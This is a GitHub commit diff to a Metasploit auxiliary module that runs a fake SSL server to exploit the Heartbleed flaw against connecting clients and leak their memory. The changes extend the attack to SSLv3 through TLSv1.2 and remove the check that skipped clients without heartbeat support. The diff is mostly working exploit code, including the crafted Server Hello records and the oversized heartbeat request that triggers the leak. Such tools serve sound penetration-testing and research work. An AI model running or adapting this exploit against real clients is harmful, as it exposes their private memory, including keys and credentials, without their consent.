Skip to content

Commit b95fcb9

Browse files
rcvallercvalle
committed
Use the protocol version sent by the client
Use the protocol version sent by the client. This should be the latest version supported by the client, which may also be the only acceptable. This makes this module work with SSLv3, TLSv1.0, TLSv1.1, and TLSv1.2 when NEGOTIATE_TLS is not enabled (see https://gist.github.com/rcvalle/10335282).
1 parent 7b6b94a commit b95fcb9

File tree

1 file changed

+12
-19
lines changed

1 file changed

+12
-19
lines changed

modules/auxiliary/server/openssl_heartbeat_client_memory.rb

Lines changed: 12 additions & 19 deletions
Original file line numberDiff line numberDiff line change
@@ -16,7 +16,7 @@ def initialize
1616
'Description' => %q{
1717
This module provides a fake SSL service that is intended to
1818
leak memory from client systems as they connect. This module is
19-
hardcoded for TLS/1.1 using the AES-128-CBC-SHA1 cipher.
19+
hardcoded for using the AES-128-CBC-SHA1 cipher.
2020
},
2121
'Author' =>
2222
[
@@ -160,19 +160,12 @@ def process_openssl_cleartext_request(c, data)
160160

161161
print_status("#{@state[c][:name]} Processing Client Hello...")
162162

163-
# Ignore clients that do not support heartbeat requests
164-
unless data.index("\x0F\x00\x01\x01")
165-
print_status("#{@state[c][:name]} Client does not support heartbeats")
166-
c.close
167-
return
168-
end
169-
170163
# Extract the client_random needed to compute the master key
171164
@state[c][:client_random] = data[11,32]
172165
@state[c][:received_hello] = true
173166

174167
print_status("#{@state[c][:name]} Sending Server Hello...")
175-
openssl_send_server_hello(c, data)
168+
openssl_send_server_hello(c, data, message_version)
176169
return
177170
end
178171

@@ -203,7 +196,7 @@ def process_openssl_cleartext_request(c, data)
203196
else
204197
# Send heartbeat requests
205198
if @state[c][:heartbeats].length < heartbeat_limit
206-
openssl_send_heartbeat(c)
199+
openssl_send_heartbeat(c, message_version)
207200
end
208201

209202
# Process cleartext heartbeat replies
@@ -244,7 +237,7 @@ def process_openssl_encrypted_request(c, data)
244237

245238
# Send heartbeat requests
246239
if @state[c][:heartbeats].length < heartbeat_limit
247-
openssl_send_heartbeat(c)
240+
openssl_send_heartbeat(c, message_version)
248241
end
249242

250243
# Process heartbeat replies
@@ -305,14 +298,14 @@ def on_client_close(c)
305298
end
306299

307300
# Send an OpenSSL Server Hello response
308-
def openssl_send_server_hello(c, hello)
301+
def openssl_send_server_hello(c, hello, version)
309302

310303
# Create the Server Hello response
311304
extensions =
312305
"\x00\x0f\x00\x01\x01" # Heartbeat
313306

314307
server_hello_payload =
315-
"\x03\x02" + # TLS Version 1.1
308+
[version].pack('n') + # Use the protocol version sent by the client.
316309
@state[c][:server_random] + # Random (Timestamp + Random Bytes)
317310
"\x00" + # Session ID
318311
"\x00\x2F" + # Cipher ID (TLS_RSA_WITH_AES_128_CBC_SHA)
@@ -321,31 +314,31 @@ def openssl_send_server_hello(c, hello)
321314

322315
server_hello = [0x02].pack("C") + [ server_hello_payload.length ].pack("N")[1,3] + server_hello_payload
323316

324-
msg1 = "\x16\x03\x02" + [server_hello.length].pack("n") + server_hello
317+
msg1 = "\x16" + [version].pack('n') + [server_hello.length].pack("n") + server_hello
325318
c.put(msg1)
326319

327320
# Skip the rest of TLS if we arent negotiating it
328321
unless negotiate_tls?
329322
# Send a heartbeat request to start the stream and return
330-
openssl_send_heartbeat(c)
323+
openssl_send_heartbeat(c, version)
331324
return
332325
end
333326

334327
# Certificates
335328
certs_combined = generate_certificates
336329
pay2 = "\x0b" + [ certs_combined.length + 3 ].pack("N")[1, 3] + [ certs_combined.length ].pack("N")[1, 3] + certs_combined
337-
msg2 = "\x16\x03\x02" + [pay2.length].pack("n") + pay2
330+
msg2 = "\x16" + [version].pack('n') + [pay2.length].pack("n") + pay2
338331
c.put(msg2)
339332

340333
# End of Server Hello
341334
pay3 = "\x0e\x00\x00\x00"
342-
msg3 = "\x16\x03\x02" + [pay3.length].pack("n") + pay3
335+
msg3 = "\x16" + [version].pack('n') + [pay3.length].pack("n") + pay3
343336
c.put(msg3)
344337
end
345338

346339
# Send the heartbeat request that results in memory exposure
347-
def openssl_send_heartbeat(c)
348-
c.put "\x18\x03\x02\x00\x03\x01" + [heartbeat_read_size].pack("n")
340+
def openssl_send_heartbeat(c, version)
341+
c.put "\x18" + [version].pack('n') + "\x00\x03\x01" + [heartbeat_read_size].pack("n")
349342
end
350343

351344
# Pack the certificates for use in the TLS reply

0 commit comments

Comments
 (0)